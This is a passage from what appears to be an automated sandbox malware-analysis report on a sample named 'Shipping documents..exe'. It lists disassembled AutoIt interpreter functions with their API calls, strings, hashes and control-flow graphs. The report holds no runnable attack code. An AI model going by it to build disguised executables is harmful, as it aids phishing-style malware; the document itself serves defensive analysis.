                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                          • API String ID: 1762048999-758534266
                                                                                                          • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                          • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                          Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104,?), ref: 00401F4C
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents..exe,00000104), ref: 00428B5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Shipping documents..exe$CMDLINE$CMDLINERAW
                                                                                                          • API String ID: 3948761352-2233779990
                                                                                                          • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                          • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                          Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                          • String ID: D)E$D)E$FILE
                                                                                                          • API String ID: 3888824918-361185794
                                                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                          Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                          • String ID: Include$\
                                                                                                          • API String ID: 3173733714-3429789819
                                                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                          Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                          • _free.LIBCMT ref: 00452A17
                                                                                                          • _free.LIBCMT ref: 00452A20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255752989-0
                                                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                          Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(00C00CA8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                          Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00C00CA8,000000FF,00000000), ref: 00410552
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                          • API String ID: 423443420-4155596026
                                                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                          Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: Default
                                                                                                          • API String ID: 1579825452-753088835
                                                                                                          • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                          • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                          Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1987 425d05-425d0b 1986->1987 1988 40f6dc-40f6df 1986->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1985 1991->1970
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                          • String ID: AU3!$EA06
                                                                                                          • API String ID: 1268643489-2658333250
                                                                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                          Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2016 4011af 2010->2016 2011->2009 2012->2001 2019 401225-42b06d call 468b0e 2012->2019 2017 401163-401166 2013->2017 2018 42b01d-42b024 2013->2018 2016->2001 2022 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2016->2022 2023 4011db-401202 SetTimer RegisterWindowMessageW 2016->2023 2025 42afe9-42b018 call 40f190 call 401a50 2017->2025 2026 40116c-401172 2017->2026 2018->2000 2024 42b02a-42b033 call 4370f4 2018->2024 2019->2009 2023->2009 2032 401204-401216 CreatePopupMenu 2023->2032 2024->2000 2025->2000 2026->2001 2034 401174-42afde call 45fd57 2026->2034 2034->2000 2045 42afe4 2034->2045 2045->2009
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                          Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
